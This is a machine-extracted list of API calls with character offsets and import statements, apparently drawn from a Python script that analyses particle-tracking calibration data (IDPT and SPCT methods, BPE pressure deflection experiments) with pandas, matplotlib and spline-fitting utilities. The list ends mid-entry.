[((681, 729), 'matplotlib.pyplot.style.use', 'plt.style.use', (["['science', 'ieee', 'std-colors']"], {}), "(['science', 'ieee', 'std-colors'])\n", (694, 729), True, 'import matplotlib.pyplot as plt\n'), ((740, 754), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {}), '()\n', (752, 754), True, 'import matplotlib.pyplot as plt\n'), ((808, 822), 'matplotlib.pyplot.close', 'plt.close', (['fig'], {}), '(fig)\n', (817, 822), True, 'import matplotlib.pyplot as plt\n'), ((1247, 1286), 'os.path.join', 'join', (['base_dir', '"""results-04.26.22_idpt"""'], {}), "(base_dir, 'results-04.26.22_idpt')\n", (1251, 1286), False, 'from os.path import join\n'), ((1306, 1343), 'os.path.join', 'join', (['path_idpt', '"""coords/test-coords"""'], {}), "(path_idpt, 'coords/test-coords')\n", (1310, 1343), False, 'from os.path import join\n'), ((1364, 1402), 'os.path.join', 'join', (['path_idpt', '"""coords/calib-coords"""'], {}), "(path_idpt, 'coords/calib-coords')\n", (1368, 1402), False, 'from os.path import join\n'), ((1421, 1450), 'os.path.join', 'join', (['path_idpt', '"""similarity"""'], {}), "(path_idpt, 'similarity')\n", (1425, 1450), False, 'from os.path import join\n'), ((1466, 1492), 'os.path.join', 'join', (['path_idpt', '"""results"""'], {}), "(path_idpt, 'results')\n", (1470, 1492), False, 'from os.path import join\n'), ((1505, 1528), 'os.path.join', 'join', (['path_idpt', '"""figs"""'], {}), "(path_idpt, 'figs')\n", (1509, 1528), False, 'from os.path import join\n'), ((13148, 13185), 'utils.io.read_test_coords', 'io.read_test_coords', (['path_test_coords'], {}), '(path_test_coords)\n', (13167, 13185), False, 'from utils import fit, functions, bin, io, plotting, modify, plot_collections\n'), ((27923, 27960), 'utils.io.read_test_coords', 'io.read_test_coords', (['path_test_coords'], {}), '(path_test_coords)\n', (27942, 27960), False, 'from utils import fit, functions, bin, io, plotting, modify, plot_collections\n'), ((28335, 28559), 'pandas.read_excel', 'pd.read_excel', (['"""/Users/mackenzie/Desktop/gdpyt-characterization/experiments/11.02.21-BPE_Pressure_Deflection_20X/analyses/results-04.26.22_spct_calib1_test-2-3/coords/test-coords/test_coords_t-calib2_c-calib1.xlsx"""'], {}), "(\n '/Users/mackenzie/Desktop/gdpyt-characterization/experiments/11.02.21-BPE_Pressure_Deflection_20X/analyses/results-04.26.22_spct_calib1_test-2-3/coords/test-coords/test_coords_t-calib2_c-calib1.xlsx'\n )\n", (28348, 28559), True, 'import pandas as pd\n'), ((28563, 28842), 'pandas.read_excel', 'pd.read_excel', (['"""/Users/mackenzie/Desktop/gdpyt-characterization/experiments/11.02.21-BPE_Pressure_Deflection_20X/analyses/results-04.26.22_spct_stack-id-on-bpe/testcalib2_calcalib1/test_coords_t_20X_ccalib1_tcalib2_c_20X_tcalib2_ccalib1_2022-04-26 20:45:34.334931.xlsx"""'], {}), "(\n '/Users/mackenzie/Desktop/gdpyt-characterization/experiments/11.02.21-BPE_Pressure_Deflection_20X/analyses/results-04.26.22_spct_stack-id-on-bpe/testcalib2_calcalib1/test_coords_t_20X_ccalib1_tcalib2_c_20X_tcalib2_ccalib1_2022-04-26 20:45:34.334931.xlsx'\n )\n", (28576, 28842), True, 'import pandas as pd\n'), ((29834, 29848), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {}), '()\n', (29846, 29848), True, 'import matplotlib.pyplot as plt\n'), ((30336, 30354), 'matplotlib.pyplot.tight_layout', 'plt.tight_layout', ([], {}), '()\n', (30352, 30354), True, 'import matplotlib.pyplot as plt\n'), ((30488, 30499), 'matplotlib.pyplot.close', 'plt.close', ([], {}), '()\n', (30497, 30499), True, 'import matplotlib.pyplot as plt\n'), ((31056, 31129), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {'nrows': '(2)', 'sharex': '(True)', 'gridspec_kw': "{'height_ratios': [1, 2]}"}), "(nrows=2, sharex=True, gridspec_kw={'height_ratios': [1, 2]})\n", (31068, 31129), True, 'import matplotlib.pyplot as plt\n'), ((32011, 32029), 'matplotlib.pyplot.tight_layout', 'plt.tight_layout', ([], {}), '()\n', (32027, 32029), True, 'import matplotlib.pyplot as plt\n'), ((32170, 32181), 'matplotlib.pyplot.close', 'plt.close', ([], {}), '()\n', (32179, 32181), True, 'import matplotlib.pyplot as plt\n'), ((32571, 32709), 'os.path.join', 'join', (['base_dir', '"""average-particle-similarity/average_similarity_SPCT_11.02.21-BPE_Pressure_Deflection_20X_c-calib1_t-calib2.xlsx"""'], {}), "(base_dir,\n 'average-particle-similarity/average_similarity_SPCT_11.02.21-BPE_Pressure_Deflection_20X_c-calib1_t-calib2.xlsx'\n )\n", (32575, 32709), False, 'from os.path import join\n'), ((32740, 32757), 'pandas.read_excel', 'pd.read_excel', (['fp'], {}), '(fp)\n', (32753, 32757), True, 'import pandas as pd\n'), ((32784, 32798), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {}), '()\n', (32796, 32798), True, 'import matplotlib.pyplot as plt\n'), ((33024, 33042), 'matplotlib.pyplot.tight_layout', 'plt.tight_layout', ([], {}), '()\n', (33040, 33042), True, 'import matplotlib.pyplot as plt\n'), ((33146, 33156), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (33154, 33156), True, 'import matplotlib.pyplot as plt\n'), ((33161, 33172), 'matplotlib.pyplot.close', 'plt.close', ([], {}), '()\n', (33170, 33172), True, 'import matplotlib.pyplot as plt\n'), ((2505, 2552), 'utils.io.read_calib_coords', 'io.read_calib_coords', (['path_calib_coords', 'method'], {}), '(path_calib_coords, method)\n', (2525, 2552), False, 'from utils import fit, functions, bin, io, plotting, modify, plot_collections\n'), ((2937, 3035), 'correction.correct.fit_in_focus_plane', 'correct.fit_in_focus_plane', ([], {'df': 'dfcpid', 'param_zf': 'param_zf', 'microns_per_pixel': 'microns_per_pixel'}), '(df=dfcpid, param_zf=param_zf, microns_per_pixel=\n microns_per_pixel)\n', (2963, 3035), False, 'from correction import correct\n'), ((3623, 3698), 'utils.fit.fit_3d_spline', 'fit.fit_3d_spline', ([], {'x': 'dfcpid.x', 'y': 'dfcpid.y', 'z': 'dfcpid[param_zf]', 'kx': 'kx', 'ky': 'ky'}), '(x=dfcpid.x, y=dfcpid.y, z=dfcpid[param_zf], kx=kx, ky=ky)\n', (3640, 3698), False, 'from utils import fit, functions, bin, io, plotting, modify, plot_collections\n'), ((4636, 4673), 'utils.io.read_test_coords', 'io.read_test_coords', (['path_test_coords'], {}), '(path_test_coords)\n', (4655, 4673), False, 'from utils import fit, functions, bin, io, plotting, modify, plot_collections\n'), ((4892, 4952), 'correction.correct.correct_z_by_spline', 'correct.correct_z_by_spline', (['dft'], {'bispl': 'bispl_c', 'param_z': '"""z"""'}), "(dft, bispl=bispl_c, param_z='z')\n", (4919, 4952), False, 'from correction import correct\n'), ((14030, 14224), 'utils.bin.bin_local_rmse_z', 'bin.bin_local_rmse_z', (['dft'], {'column_to_bin': 'column_to_bin', 'bins': '(1)', 'min_cm': 'min_cm', 'z_range': 'None', 'round_to_decimal': 'round_z_to_decimal', 'df_ground_truth': 'None', 'dropna': '(True)', 'error_column': '"""error"""'}), "(dft, column_to_bin=column_to_bin, bins=1, min_cm=\n min_cm, z_range=None, round_to_decimal=round_z_to_decimal,\n df_ground_truth=None, dropna=True, error_column='error')\n", (14050, 14224), False, 'from utils import fit, functions, bin, io, plotting, modify, plot_collections\n'), ((14733, 14932), 'utils.bin.bin_local_rmse_z', 'bin.bin_local_rmse_z', (['dft'], {'column_to_bin': 'column_to_bin', 'bins': 'bins_z', 'min_cm': 'min_cm', 'z_range': 'None', 'round_to_decimal': 'round_z_to_decimal', 'df_ground_truth': 'None', 'dropna': '(True)', 'error_column': '"""error"""'}), "(dft, column_to_bin=column_to_bin, bins=bins_z, min_cm=\n min_cm, z_range=None, round_to_decimal=round_z_to_decimal,\n df_ground_truth=None, dropna=True, error_column='error')\n", (14753, 14932), False, 'from utils import fit, functions, bin, io, plotting, modify, plot_collections\n'), ((15441, 15579), 'utils.bin.bin_generic', 'bin.bin_generic', (['dft'], {'column_to_bin': '"""bin"""', 'column_to_count': '"""id"""', 'bins': 'bins_z', 'round_to_decimal': 'round_z_to_decimal', 'return_groupby': '(True)'}), "(dft, column_to_bin='bin', column_to_count='id', bins=bins_z,\n round_to_decimal=round_z_to_decimal, return_groupby=True)\n", (15456, 15579), False, 'from utils import fit, functions, bin, io, plotting, modify, plot_collections\n'), ((18493, 18596), 'utils.bin.bin_by_list', 'bin.bin_by_list', (['dft'], {'column_to_bin': 'column_to_bin', 'bins': 'bins_x', 'round_to_decimal': 'round_x_to_decimal'}), '(dft, column_to_bin=column_to_bin, bins=bins_x,\n round_to_decimal=round_x_to_decimal)\n', (18508, 18596), False, 'from utils import fit, functions, bin, io, plotting, modify, plot_collections\n'), ((19018, 19032), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {}), '()\n', (19030, 19032), True, 'import matplotlib.pyplot as plt\n'), ((19664, 19682), 'matplotlib.pyplot.tight_layout', 'plt.tight_layout', ([], {}), '()\n', (19680, 19682), True, 'import matplotlib.pyplot as plt\n'), ((19838, 19849), 'matplotlib.pyplot.close', 'plt.close', ([], {}), '()\n', (19847, 19849), True, 'import matplotlib.pyplot as plt\n'), ((25021, 25058), 'os.path.join', 'join', (['path_results', '"""on-edge-off-bpe"""'], {}), "(path_results, 'on-edge-off-bpe')\n", (25025, 25058), False, 'from os.path import join\n'), ((30382, 30445), 'matplotlib.pyplot.savefig', 'plt.savefig', (["(path_figs + '/compare-idpt-spct_num-particles.png')"], {}), "(path_figs + '/compare-idpt-spct_num-particles.png')\n", (30393, 30445), True, 'import matplotlib.pyplot as plt\n'), ((30473, 30483), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (30481, 30483), True, 'import matplotlib.pyplot as plt\n'), ((32057, 32127), 'matplotlib.pyplot.savefig', 'plt.savefig', (["(path_figs + '/compare-idpt-spct_num-particles_and_cm.png')"], {}), "(path_figs + '/compare-idpt-spct_num-particles_and_cm.png')\n", (32068, 32127), True, 'import matplotlib.pyplot as plt\n'), ((32155, 32165), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (32163, 32165), True, 'import matplotlib.pyplot as plt\n'), ((33070, 33141), 'matplotlib.pyplot.savefig', 'plt.savefig', (["(path_figs + '/average-particle-to-particle-similarity.png')"], {}), "(path_figs + '/average-particle-to-particle-similarity.png')\n", (33081, 33141), True, 'import matplotlib.pyplot as plt\n'), ((3127, 3212), 'utils.plotting.plot_fitted_plane_and_points', 'plotting.plot_fitted_plane_and_points', ([], {'df': 'dfcpid', 'dict_fit_plane': 'dictc_fit_plane'}), '(df=dfcpid, dict_fit_plane=dictc_fit_plane\n )\n', (3164, 3212), False, 'from utils import fit, functions, bin, io, plotting, modify, plot_collections\n'), ((3220, 3283), 'matplotlib.pyplot.savefig', 'plt.savefig', (["(path_figs + '/idpt-calib-coords_fit-plane_raw.png')"], {}), "(path_figs + '/idpt-calib-coords_fit-plane_raw.png')\n", (3231, 3283), True, 'import matplotlib.pyplot as plt\n'), ((3296, 3307), 'matplotlib.pyplot.close', 'plt.close', ([], {}), '()\n', (3305, 3307), True, 'import matplotlib.pyplot as plt\n'), ((3339, 3413), 'pandas.DataFrame.from_dict', 'pd.DataFrame.from_dict', (['dictc_fit_plane'], {'orient': '"""index"""', 'columns': "['value']"}), "(dictc_fit_plane, orient='index', columns=['value'])\n", (3361, 3413), True, 'import pandas as pd\n'), ((3928, 4056), 'utils.plotting.scatter_3d_and_spline', 'plotting.scatter_3d_and_spline', (['dfcpid.x', 'dfcpid.y', 'dfcpid[param_zf]', 'bispl_c'], {'cmap': '"""RdBu"""', 'grid_resolution': '(30)', 'view': '"""multi"""'}), "(dfcpid.x, dfcpid.y, dfcpid[param_zf],\n bispl_c, cmap='RdBu', grid_resolution=30, view='multi')\n", (3958, 4056), False, 'from utils import fit, functions, bin, io, plotting, modify, plot_collections\n'), ((4574, 4585), 'matplotlib.pyplot.close', 'plt.close', ([], {}), '()\n', (4583, 4585), True, 'import matplotlib.pyplot as plt\n'), ((5904, 5979), 'os.path.join', 'join', (['base_dir', '"""results-04.26.22_spct_calib1_test-2-3/coords/calib-coords"""'], {}), "(base_dir, 'results-04.26.22_spct_calib1_test-2-3/coords/calib-coords')\n", (5908, 5979), False, 'from os.path import join\n'), ((6013, 6100), 'os.path.join', 'join', (['path_spct_calib_coords', '"""calib_spct_pid_defocus_stats_c-calib1_t-calib2.xlsx"""'], {}), "(path_spct_calib_coords,\n 'calib_spct_pid_defocus_stats_c-calib1_t-calib2.xlsx')\n", (6017, 6100), False, 'from os.path import join\n'), ((6129, 6200), 'os.path.join', 'join', (['path_spct_calib_coords', '"""calib_spct_stats_c-calib1_t-calib2.xlsx"""'], {}), "(path_spct_calib_coords, 'calib_spct_stats_c-calib1_t-calib2.xlsx')\n", (6133, 6200), False, 'from os.path import join\n'), ((6231, 6318), 'os.path.join', 'join', (['path_spct_calib_coords', '"""calib_spct_pop_defocus_stats_c-calib1_t-calib2.xlsx"""'], {}), "(path_spct_calib_coords,\n 'calib_spct_pop_defocus_stats_c-calib1_t-calib2.xlsx')\n", (6235, 6318), False, 'from os.path import join\n'), ((6401, 6473), 'os.path.join', 'join', (['base_dir', '"""results-04.28.22_spct-calib2_test3/coords/calib-coords"""'], {}), "(base_dir, 'results-04.28.22_spct-calib2_test3/coords/calib-coords')\n", (6405, 6473), False, 'from os.path import join\n'), ((6506, 6592), 'os.path.join', 'join', (['path_spct_test_coords', '"""calib_spct_pid_defocus_stats_c-calib2_t-calib3.xlsx"""'], {}), "(path_spct_test_coords,\n 'calib_spct_pid_defocus_stats_c-calib2_t-calib3.xlsx')\n", (6510, 6592), False, 'from os.path import join\n'), ((6620, 6690), 'os.path.join', 'join', (['path_spct_test_coords', '"""calib_spct_stats_c-calib2_t-calib3.xlsx"""'], {}), "(path_spct_test_coords, 'calib_spct_stats_c-calib2_t-calib3.xlsx')\n", (6624, 6690), False, 'from os.path import join\n'), ((6720, 6806), 'os.path.join', 'join', (['path_spct_test_coords', '"""calib_spct_pop_defocus_stats_c-calib2_t-calib3.xlsx"""'], {}), "(path_spct_test_coords,\n 'calib_spct_pop_defocus_stats_c-calib2_t-calib3.xlsx')\n", (6724, 6806), False, 'from os.path import join\n'), ((8357, 8455), 'correction.correct.fit_in_focus_plane', 'correct.fit_in_focus_plane', ([], {'df': 'dfcpid', 'param_zf': 'param_zf', 'microns_per_pixel': 'microns_per_pixel'}), '(df=dfcpid, param_zf=param_zf, microns_per_pixel=\n microns_per_pixel)\n', (8383, 8455), False, 'from correction import correct\n'), ((11256, 11354), 'correction.correct.fit_in_focus_plane', 'correct.fit_in_focus_plane', ([], {'df': 'dfcpid', 'param_zf': 'param_zf', 'microns_per_pixel': 'microns_per_pixel'}), '(df=dfcpid, param_zf=param_zf, microns_per_pixel=\n microns_per_pixel)\n', (11282, 11354), False, 'from correction import correct\n'), ((15914, 15930), 'matplotlib.pyplot.close', 'plt.close', (['"""all"""'], {}), "('all')\n", (15923, 15930), True, 'import matplotlib.pyplot as plt\n'), ((16042, 16056), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {}), '()\n', (16054, 16056), True, 'import matplotlib.pyplot as plt\n'), ((16328, 16346), 'matplotlib.pyplot.tight_layout', 'plt.tight_layout', ([], {}), '()\n', (16344, 16346), True, 'import matplotlib.pyplot as plt\n'), ((16503, 16514), 'matplotlib.pyplot.close', 'plt.close', ([], {}), '()\n', (16512, 16514), True, 'import matplotlib.pyplot as plt\n'), ((16626, 16676), 'scipy.optimize.curve_fit', 'curve_fit', (['functions.line', 'dfrmse.z_true', 'dfrmse.z'], {}), '(functions.line, dfrmse.z_true, dfrmse.z)\n', (16635, 16676), False, 'from scipy.optimize import curve_fit\n'), ((17003, 17017), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {}), '()\n', (17015, 17017), True, 'import matplotlib.pyplot as plt\n'), ((17794, 17812), 'matplotlib.pyplot.tight_layout', 'plt.tight_layout', ([], {}), '()\n', (17810, 17812), True, 'import matplotlib.pyplot as plt\n'), ((18275, 18286), 'matplotlib.pyplot.close', 'plt.close', ([], {}), '()\n', (18284, 18286), True, 'import matplotlib.pyplot as plt\n'), ((19718, 19783), 'matplotlib.pyplot.savefig', 'plt.savefig', (["(path_figs + '/on-edge-off-bpe_calibration_curve.png')"], {}), "(path_figs + '/on-edge-off-bpe_calibration_curve.png')\n", (19729, 19783), True, 'import matplotlib.pyplot as plt\n'), ((19819, 19829), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (19827, 19829), True, 'import matplotlib.pyplot as plt\n'), ((20235, 20429), 'utils.bin.bin_local_rmse_z', 'bin.bin_local_rmse_z', (['dft'], {'column_to_bin': 'column_to_bin', 'bins': '(1)', 'min_cm': 'min_cm', 'z_range': 'None', 'round_to_decimal': 'round_z_to_decimal', 'df_ground_truth': 'None', 'dropna': '(True)', 'error_column': '"""error"""'}), "(dft, column_to_bin=column_to_bin, bins=1, min_cm=\n min_cm, z_range=None, round_to_decimal=round_z_to_decimal,\n df_ground_truth=None, dropna=True, error_column='error')\n", (20255, 20429), False, 'from utils import fit, functions, bin, io, plotting, modify, plot_collections\n'), ((21001, 21200), 'utils.bin.bin_local_rmse_z', 'bin.bin_local_rmse_z', (['dft'], {'column_to_bin': 'column_to_bin', 'bins': 'bins_z', 'min_cm': 'min_cm', 'z_range': 'None', 'round_to_decimal': 'round_z_to_decimal', 'df_ground_truth': 'None', 'dropna': '(True)', 'error_column': '"""error"""'}), "(dft, column_to_bin=column_to_bin, bins=bins_z, min_cm=\n min_cm, z_range=None, round_to_decimal=round_z_to_decimal,\n df_ground_truth=None, dropna=True, error_column='error')\n", (21021, 21200), False, 'from utils import fit, functions, bin, io, plotting, modify, plot_collections\n'), ((21765, 21903), 'utils.bin.bin_generic', 'bin.bin_generic', (['dft'], {'column_to_bin': '"""bin"""', 'column_to_count': '"""id"""', 'bins': 'bins_z', 'round_to_decimal': 'round_z_to_decimal', 'return_groupby': '(True)'}), "(dft, column_to_bin='bin', column_to_count='id', bins=bins_z,\n round_to_decimal=round_z_to_decimal, return_groupby=True)\n", (21780, 21903), False, 'from utils import fit, functions, bin, io, plotting, modify, plot_collections\n'), ((25601, 25615), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {}), '()\n', (25613, 25615), True, 'import matplotlib.pyplot as plt\n'), ((26112, 26130), 'matplotlib.pyplot.tight_layout', 'plt.tight_layout', ([], {}), '()\n', (26128, 26130), True, 'import matplotlib.pyplot as plt\n'), ((26311, 26322), 'matplotlib.pyplot.close', 'plt.close', ([], {}), '()\n', (26320, 26322), True, 'import matplotlib.pyplot as plt\n'), ((26448, 26521), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {'nrows': '(2)', 'sharex': '(True)', 'gridspec_kw': "{'height_ratios': [1, 2]}"}), "(nrows=2, sharex=True, gridspec_kw={'height_ratios': [1, 2]})\n", (26460, 26521), True, 'import matplotlib.pyplot as plt\n'), ((27385, 27403), 'matplotlib.pyplot.tight_layout', 'plt.tight_layout', ([], {}), '()\n', (27401, 27403), True, 'import matplotlib.pyplot as plt\n'), ((27587, 27598), 'matplotlib.pyplot.close', 'plt.close', ([], {}), '()\n', (27596, 27598), True, 'import matplotlib.pyplot as plt\n'), ((29988, 30016), 'utils.plotting.lighten_color', 'lighten_color', (['scigreen', '(1.0)'], {}), '(scigreen, 1.0)\n', (30001, 30016), False, 'from utils.plotting import lighten_color\n'), ((30099, 30127), 'utils.plotting.lighten_color', 'lighten_color', (['scigreen', '(1.2)'], {}), '(scigreen, 1.2)\n', (30112, 30127), False, 'from utils.plotting import lighten_color\n'), ((31264, 31292), 'utils.plotting.lighten_color', 'lighten_color', (['scigreen', '(1.0)'], {}), '(scigreen, 1.0)\n', (31277, 31292), False, 'from utils.plotting import lighten_color\n'), ((31358, 31386), 'utils.plotting.lighten_color', 'lighten_color', (['scigreen', '(1.2)'], {}), '(scigreen, 1.2)\n', (31371, 31386), False, 'from utils.plotting import lighten_color\n'), ((31626, 31654), 'utils.plotting.lighten_color', 'lighten_color', (['scigreen', '(1.0)'], {}), '(scigreen, 1.0)\n', (31639, 31654), False, 'from utils.plotting import lighten_color\n'), ((31737, 31765), 'utils.plotting.lighten_color', 'lighten_color', (['scigreen', '(1.2)'], {}), '(scigreen, 1.2)\n', (31750, 31765), False, 'from utils.plotting import lighten_color\n'), ((7362, 7399), 'pandas.read_excel', 'pd.read_excel', (['path_calib_pid_defocus'], {}), '(path_calib_pid_defocus)\n', (7375, 7399), True, 'import pandas as pd\n'), ((7423, 7459), 'pandas.read_excel', 'pd.read_excel', (['path_calib_spct_stats'], {}), '(path_calib_spct_stats)\n', (7436, 7459), True, 'import pandas as pd\n'), ((7481, 7588), 'utils.modify.merge_calib_pid_defocus_and_correction_coords', 'modify.merge_calib_pid_defocus_and_correction_coords', (['path_calib_coords', 'method'], {'dfs': '[dfcstats, dfcpid]'}), '(path_calib_coords,\n method, dfs=[dfcstats, dfcpid])\n', (7533, 7588), False, 'from utils import fit, functions, bin, io, plotting, modify, plot_collections\n'), ((7814, 7884), 'os.path.join', 'join', (['path_calib_coords', '"""calib_spct_pid_defocus_stats_calib1_xy.xlsx"""'], {}), "(path_calib_coords, 'calib_spct_pid_defocus_stats_calib1_xy.xlsx')\n", (7818, 7884), False, 'from os.path import join\n'), ((7906, 7943), 'pandas.read_excel', 'pd.read_excel', (['path_calib_pid_defocus'], {}), '(path_calib_pid_defocus)\n', (7919, 7943), True, 'import pandas as pd\n'), ((8547, 8632), 'utils.plotting.plot_fitted_plane_and_points', 'plotting.plot_fitted_plane_and_points', ([], {'df': 'dfcpid', 'dict_fit_plane': 'dictc_fit_plane'}), '(df=dfcpid, dict_fit_plane=dictc_fit_plane\n )\n', (8584, 8632), False, 'from utils import fit, functions, bin, io, plotting, modify, plot_collections\n'), ((8640, 8704), 'matplotlib.pyplot.savefig', 'plt.savefig', (["(path_figs + '/calibration-coords_fit-plane_raw.png')"], {}), "(path_figs + '/calibration-coords_fit-plane_raw.png')\n", (8651, 8704), True, 'import matplotlib.pyplot as plt\n'), ((8717, 8728), 'matplotlib.pyplot.close', 'plt.close', ([], {}), '()\n', (8726, 8728), True, 'import matplotlib.pyplot as plt\n'), ((8760, 8834), 'pandas.DataFrame.from_dict', 'pd.DataFrame.from_dict', (['dictc_fit_plane'], {'orient': '"""index"""', 'columns': "['value']"}), "(dictc_fit_plane, orient='index', columns=['value'])\n", (8782, 8834), True, 'import pandas as pd\n'), ((9045, 9120), 'utils.fit.fit_3d_spline', 'fit.fit_3d_spline', ([], {'x': 'dfcpid.x', 'y': 'dfcpid.y', 'z': 'dfcpid[param_zf]', 'kx': 'kx', 'ky': 'ky'}), '(x=dfcpid.x, y=dfcpid.y, z=dfcpid[param_zf], kx=kx, ky=ky)\n', (9062, 9120), False, 'from utils import fit, functions, bin, io, plotting, modify, plot_collections\n'), ((9336, 9464), 'utils.plotting.scatter_3d_and_spline', 'plotting.scatter_3d_and_spline', (['dfcpid.x', 'dfcpid.y', 'dfcpid[param_zf]', 'bispl_c'], {'cmap': '"""RdBu"""', 'grid_resolution': '(30)', 'view': '"""multi"""'}), "(dfcpid.x, dfcpid.y, dfcpid[param_zf],\n bispl_c, cmap='RdBu', grid_resolution=30, view='multi')\n", (9366, 9464), False, 'from utils import fit, functions, bin, io, plotting, modify, plot_collections\n'), ((9983, 9994), 'matplotlib.pyplot.close', 'plt.close', ([], {}), '()\n', (9992, 9994), True, 'import matplotlib.pyplot as plt\n'), ((10284, 10320), 'pandas.read_excel', 'pd.read_excel', (['path_test_pid_defocus'], {}), '(path_test_pid_defocus)\n', (10297, 10320), True, 'import pandas as pd\n'), ((10344, 10379), 'pandas.read_excel', 'pd.read_excel', (['path_test_spct_stats'], {}), '(path_test_spct_stats)\n', (10357, 10379), True, 'import pandas as pd\n'), ((10401, 10508), 'utils.modify.merge_calib_pid_defocus_and_correction_coords', 'modify.merge_calib_pid_defocus_and_correction_coords', (['path_calib_coords', 'method'], {'dfs': '[dfcstats, dfcpid]'}), '(path_calib_coords,\n method, dfs=[dfcstats, dfcpid])\n', (10453, 10508), False, 'from utils import fit, functions, bin, io, plotting, modify, plot_collections\n'), ((10734, 10804), 'os.path.join', 'join', (['path_calib_coords', '"""calib_spct_pid_defocus_stats_calib2_xy.xlsx"""'], {}), "(path_calib_coords, 'calib_spct_pid_defocus_stats_calib2_xy.xlsx')\n", (10738, 10804), False, 'from os.path import join\n'), ((10826, 10863), 'pandas.read_excel', 'pd.read_excel', (['path_calib_pid_defocus'], {}), '(path_calib_pid_defocus)\n', (10839, 10863), True, 'import pandas as pd\n'), ((11445, 11530), 'utils.plotting.plot_fitted_plane_and_points', 'plotting.plot_fitted_plane_and_points', ([], {'df': 'dfcpid', 'dict_fit_plane': 'dictc_fit_plane'}), '(df=dfcpid, dict_fit_plane=dictc_fit_plane\n )\n', (11482, 11530), False, 'from utils import fit, functions, bin, io, plotting, modify, plot_collections\n'), ((11538, 11595), 'matplotlib.pyplot.savefig', 'plt.savefig', (["(path_figs + '/test-coords_fit-plane_raw.png')"], {}), "(path_figs + '/test-coords_fit-plane_raw.png')\n", (11549, 11595), True, 'import matplotlib.pyplot as plt\n'), ((11608, 11619), 'matplotlib.pyplot.close', 'plt.close', ([], {}), '()\n', (11617, 11619), True, 'import matplotlib.pyplot as plt\n'), ((11651, 11725), 'pandas.DataFrame.from_dict', 'pd.DataFrame.from_dict', (['dictc_fit_plane'], {'orient': '"""index"""', 'columns': "['value']"}), "(dictc_fit_plane, orient='index', columns=['value'])\n", (11673, 11725), True, 'import pandas as pd\n'), ((11929, 12004), 'utils.fit.fit_3d_spline', 'fit.fit_3d_spline', ([], {'x': 'dfcpid.x', 'y': 'dfcpid.y', 'z': 'dfcpid[param_zf]', 'kx': 'kx', 'ky': 'ky'}), '(x=dfcpid.x, y=dfcpid.y, z=dfcpid[param_zf], kx=kx, ky=ky)\n', (11946, 12004), False, 'from utils import fit, functions, bin, io, plotting, modify, plot_collections\n'), ((12220, 12348), 'utils.plotting.scatter_3d_and_spline', 'plotting.scatter_3d_and_spline', (['dfcpid.x', 'dfcpid.y', 'dfcpid[param_zf]', 'bispl_c'], {'cmap': '"""RdBu"""', 'grid_resolution': '(30)', 'view': '"""multi"""'}), "(dfcpid.x, dfcpid.y, dfcpid[param_zf],\n bispl_c, cmap='RdBu', grid_resolution=30, view='multi')\n", (12250, 12348), False, 'from utils import fit, functions, bin, io, plotting, modify, plot_collections\n'), ((12860, 12871), 'matplotlib.pyplot.close', 'plt.close', ([], {}), '()\n', (12869, 12871), True, 'import matplotlib.pyplot as plt\n'), ((16390, 16436), 'matplotlib.pyplot.savefig', 'plt.savefig', (["(path_figs + '/rmse-z_microns.png')"], {}), "(path_figs + '/rmse-z_microns.png')\n", (16401, 16436), True, 'import matplotlib.pyplot as plt\n'), ((16480, 16490), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (16488, 16490), True, 'import matplotlib.pyplot as plt\n'), ((17235, 17263), 'utils.functions.line', 'functions.line', (['z_fit', '*popt'], {}), '(z_fit, *popt)\n', (17249, 17263), False, 'from utils import fit, functions, bin, io, plotting, modify, plot_collections\n'), ((18252, 18262), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (18260, 18262), True, 'import matplotlib.pyplot as plt\n'), ((22274, 22290), 'matplotlib.pyplot.close', 'plt.close', (['"""all"""'], {}), "('all')\n", (22283, 22290), True, 'import matplotlib.pyplot as plt\n'), ((22414, 22428), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {}), '()\n', (22426, 22428), True, 'import matplotlib.pyplot as plt\n'), ((22724, 22742), 'matplotlib.pyplot.tight_layout', 'plt.tight_layout', ([], {}), '()\n', (22740, 22742), True, 'import matplotlib.pyplot as plt\n'), ((22934, 22945), 'matplotlib.pyplot.close', 'plt.close', ([], {}), '()\n', (22943, 22945), True, 'import matplotlib.pyplot as plt\n'), ((23069, 23119), 'scipy.optimize.curve_fit', 'curve_fit', (['functions.line', 'dfrmse.z_true', 'dfrmse.z'], {}), '(functions.line, dfrmse.z_true, dfrmse.z)\n', (23078, 23119), False, 'from scipy.optimize import curve_fit\n'), ((23468, 23482), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {}), '()\n', (23480, 23482), True, 'import matplotlib.pyplot as plt\n'), ((24335, 24353), 'matplotlib.pyplot.tight_layout', 'plt.tight_layout', ([], {}), '()\n', (24351, 24353), True, 'import matplotlib.pyplot as plt\n'), ((24904, 24915), 'matplotlib.pyplot.close', 'plt.close', ([], {}), '()\n', (24913, 24915), True, 'import matplotlib.pyplot as plt\n'), ((26174, 26244), 'matplotlib.pyplot.savefig', 'plt.savefig', (["(path_figs + '/compare-on-edge-off-bpe_rmse-z_microns.png')"], {}), "(path_figs + '/compare-on-edge-off-bpe_rmse-z_microns.png')\n", (26185, 26244), True, 'import matplotlib.pyplot as plt\n'), ((26288, 26298), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (26296, 26298), True, 'import matplotlib.pyplot as plt\n'), ((27447, 27520), 'matplotlib.pyplot.savefig', 'plt.savefig', (["(path_figs + '/compare-on-edge-off-bpe_rmse-z_microns_cm.png')"], {}), "(path_figs + '/compare-on-edge-off-bpe_rmse-z_microns_cm.png')\n", (27458, 27520), True, 'import matplotlib.pyplot as plt\n'), ((27564, 27574), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (27572, 27574), True, 'import matplotlib.pyplot as plt\n'), ((4442, 4461), 'numpy.round', 'np.round', (['rmse_c', 